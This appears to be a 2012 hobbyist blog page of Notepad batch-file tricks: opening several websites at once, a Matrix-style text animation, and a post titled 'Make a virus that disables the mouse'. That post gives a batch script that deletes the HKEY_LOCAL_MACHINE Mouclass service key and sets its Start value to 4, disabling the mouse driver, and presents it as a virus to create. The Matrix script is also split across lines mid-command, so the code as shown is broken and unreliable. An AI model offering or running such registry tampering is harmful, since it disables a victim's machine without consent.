Welcome To HaritTechs,Here You Can Download Anything

Liked us?

Slider

Amazom.com

Showing posts with label Tricks with Notepad. Show all posts
Showing posts with label Tricks with Notepad. Show all posts

Friday, October 5, 2012

How to open number of sites with one click?


               Today i will show you how to make a batch file which will open number of websites with just one click. You can also use this method to open different computer programmes like internet explorer, notepad etc.

  • Open Notepad and copy below codes
@echo off
start www.haritdagar.co.cc
start www.google.com
start www.facebook.com
  • Save this file as batch.bat
  • Now open your save file and it will open three websites wilth just one click.
  • You can also add more sites by writting Start followed by websites

Make a virus that disables the mouse




               I had previously posted on making different batch files like matrix effect, opening no of websites with one click which were interesting and completely harmless but today we will be making a batch virus which is harmfull it will disable your mouse so think before trying it on yourself.

  • Open Notepad and copy below codes
rem ---------------------------------
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------
  • Save this file as  virus.bat
  • Done you just created your virus.

Tuesday, October 2, 2012

Matrix effect




            I had previously posted about Matrix effect using notepad . But this is more advance its look more advance then the previous one. So open up your notepad and get started.

  • Open Notepad and copy below code.

@echo off
cls
title Enter The Matrix
color 02

set string=Wake up Neo...
set /a len=18
call :DisplayText

ping localhost -n 4 >nul
set string=The Matrix has you...
set /a len=25
call :DisplayText

ping localhost -n 4 >nul
set string=Follow the white rabbit.
set /a len=28
call :DisplayText

ping localhost -n 4 >nul
set string=Knock, knock, Neo...
set /a len=24
call :DisplayText

ping localhost -n 4 >nul


goto matrix


:DisplayText

set /a dispvar =1
set /a len +=1

:DisplayLoop

CALL SET str=%%string:~0,

%dispvar%%%

cls
echo %str%
ping localhost -n 1 >nul

set /a dispvar +=1

if '%dispvar%'=='%len%' goto

enddisplay

goto DisplayLoop

:enddisplay
exit /b

:matrix
setlocal enabledelayedexpansion
for /l %%A in (1,1,39) do (
set /a rnd=!random!%%5+1
if !rnd!==1 (
set /a rnd2=!random!%%26+1
set num=1
for %%A in (A B C D E F G H I J K L

M N O P Q R S T U V W X Y Z) do (
if !rnd2!==!num! (
set add=%%A
)
set /a num+=1
)
) else set /a add=!rnd!%%2
set var=!var! !add!
)
echo !var!
call :matrix
  •  Save the file as matrix.bat  (.bat is must)
  •  Done enjoy !!
</

Amazon.com

License

Creative Commons License
Cars@Live by HaritTechs is licensed under a Creative Commons Attribution-NonCommercial-NoDerivs 3.0 Unported License.
Based on a work at http://www.haritdagar.com.
Permissions beyond the scope of this license may be available at Harittechs.

Visitors